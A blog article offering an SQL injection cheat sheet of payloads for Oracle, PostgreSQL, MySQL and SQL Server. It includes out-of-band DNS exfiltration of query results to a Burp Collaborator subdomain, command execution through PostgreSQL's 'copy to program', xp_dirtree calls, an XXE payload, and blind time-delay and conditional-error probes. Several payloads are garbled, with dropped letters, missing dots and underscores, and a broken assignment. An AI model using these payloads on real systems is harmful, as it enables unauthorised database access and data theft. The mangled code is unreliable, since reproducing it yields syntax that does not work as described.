List of content you will read in this article:
An Introduction to SQL Injection Cheat Sheet
class="link-id">
SQL is short for Structured Query Language and is used to communicate with a database. In 1986 and 1987, it became the standard of the ANSI and ISO and has been widely used. Throughout this article, we will teach you about SQL injection and the different ways it can be performed, aka, SQL injection cheat sheet. Keep reading to find out more.
What is SQL Injection?
class="link-id">
We talked about how SQL has become the standard for communicating with databases. But the same language can be used to attack the same databases, which is called SQL injection (SQLi). In other words, SQL injection is a security weakness that attackers use to interfere with an application’s queries to its database.
Why would anyone want access to these queries? The answer is pretty simple. Every piece of data that the app has access to, including all users’ data, can be accessed with an SQL injection. Attackers can use these pieces of information to make changes to the app’s content. They might even sell the user data to third parties for several reasons. And if you’re not careful enough, the attacker could also target your back-end infrastructure. But as for the methods for SQL injections, the next section will teach you every method in detail. Keep reading to find out more.
SQL Injection Methods
class="link-id">
Now for the part you’ve been waiting for, the SQL injection cheat sheet. You can use the methods below in different situations, depending on what you need to do. Let’s have a look.
DNS lookup
Users can use this method to make the database perform a DNS lookup to external domains. The main requirement is generating a Burp Collaborator subdomain to use. Further on in your attack, you must poll said collaborator server to ensure that your DNS lookup has succeeded.
MySQL
This technique works only on Windows.
LOAD_FILE('\BURPCOLLABORATORSUBDOMAIN\a')
SELECT INTO OUTFILE '\BURP-COLLABORATOR-SUBDOMAIN\a'
PostgreSQL
copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
Microsoft
exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'
Oracle
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
DNS lookup using Data Exfiltration
This method makes the database do a DNS lookup to the external domain with the injected query’s results. The main requirement is generating a Burp Collaborator subdomain to use. Further on in your attack, you must poll said collaborator server to get the details of the DNS interactions.
PostgreSQL
Replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT p (SELECT-YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURPCOLLABORATORSUBDOMAIN''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();
MySQL
This technique works only on Windows.
SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'
Microsoft
declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')
Oracle
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual
String concatenation
Use this method to make a single string by concatenating together multiple strings.
PostgreSQL
'foo' | | 'bar'
Microsoft
'foo'+'bar'
MySQL
CONCAT('foo','bar')
Oracle
'foo' | | 'bar'
Substring
This is used to extract one part of the string. Said part should have a specific offset and a specific length, with the offset index being 1-based.
Oracle
SUBSTR('foobar', 4, 2)
PostgreSQL
SUBSTRING('foobar', 4, 2)
MySQL
SUBSTRING('foobar', 4, 2)
Microsoft
SUBSTRING('foobar', 4, 2)
Comments
This removes the part of the query that follows your input after you truncate the query.
Oracle
--comment
PostgreSQL
--comment
/*comment*/
MySQL
#comment
-- comment
/*comment*/
Microsoft
--comment
/*comment*/
Database version
This is used when you want to find out the type and version of the database. You can use this information to formulate complex attacks.
Oracle
SELECT banner FROM v$version
SELECT version FROM v$instance
PostgreSQL
SELECT version()
MySQL
SELECT @@version
Microsoft
SELECT @@version
Database content
This is used to collect the tables in the database and everything else that these tables contain.
Oracle
ELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'TABLENAME'
PostgreSQL
SELECT * FROM informationschematables
SELECT * FROM informationschemacolumns WHERE tablename = 'TABLENAME'
MySQL
SELECT * FROM informationschematables
SELECT * FROM informationschemacolumns WHERE tablename = 'TABLENAME'
Microsoft
SELECT * FROM informationschematables
SELECT * FROM informationschemacolumns WHERE tablename = 'TABLENAME'
Conditional errors
This is used to test single Boolean conditions. Also, it can trigger database errors when the condition turns out true.
Oracle
SELECT CASE WHEN (YOURCONDITION) THEN TOCHAR(1/0) ELSE NULL END FROM dual
PostgreSQL
1 = (SELECT CASE WHEN (YOURCONDITION) THEN CAST(1/0 AS INTEGER) ELSE NULL END)
MySQL
SELECT IF(YOURCONDITION,(SELECT tablename FROM informationschematables),'a')
Microsoft
SELECT CASE WHEN (YOURCONDITION) THEN 1/0 ELSE NULL END
Batched queries
If you want to query multiple databases at once, use batched queries. An important thing to remember is that while one of your queries is executed, your results will not return to the app. This is why users mostly use batched queries for blind vulnerabilities.
Oracle
NOT SUPPORTED BY ORACLE.
PostgreSQL
QUERY-1-HERE; QUERY-2-HERE
MySQL
QUERY-1-HERE; QUERY-2-HERE
Microsoft
QUERY-1-HERE; QUERY-2-HERE
Time delays
Time delays are used after queries are processed and done. The lines below will trigger a ten-second time delay. Change the “10” to any number of seconds you want the delay to last.
Oracle
dbms_pipe.receive_message(('a'),10)
PostgreSQL
SELECT pg_sleep(10)
MySQL
SELECT SLEEP(10)
Microsoft
WAITFOR DELAY '0:0:10'
Conditional time delays
Similar to conditional errors, this is used to test single Boolean conditions. The difference is conditional time delays will trigger time delays if the condition is true.
Oracle
SELECT CASE WHEN (YOURCONDITION) THEN 'a'||dbmspipe.receivemessage(('a'),10) ELSE NULL END
PostgreSQL
SELECT CASE WHEN (YOURCONDITION) THEN pg_sleep(10) ELSE pg_sleep(0) END
MySQL
SELECT IF(YOURCONDITION,SLEEP(10),'a')
Microsoft
IF (YOURCONDITION) WAITFOR DELAY '0:0:10'
Bullet points for social media.
- SQL is short for Structured Query Language and is used to communicate with a database.
- SQL injection is a security weakness that attackers use to interfere with an application’s queries to its database.
- You can perform a variety of tasks with SQLi. You can do everything from simply gaining access to the database to gathering all its content or even performing a DNS lookup.
The tasks you can perform are as listed below:
- String concatenation
- Substring
- Comments
- Database version
- Database contents
- Conditional errors
- Batched queries
- Time delays
- Conditional time delays
- DNS lookup (with or without data exfiltration)
People also read:
I'm fascinated by the IT world and how the 1's and 0's work. While I venture into the world of Technology, I try to share what I know in the simplest way with you. Not a fan of coffee, a travel addict, and a self-accredited 'master chef'.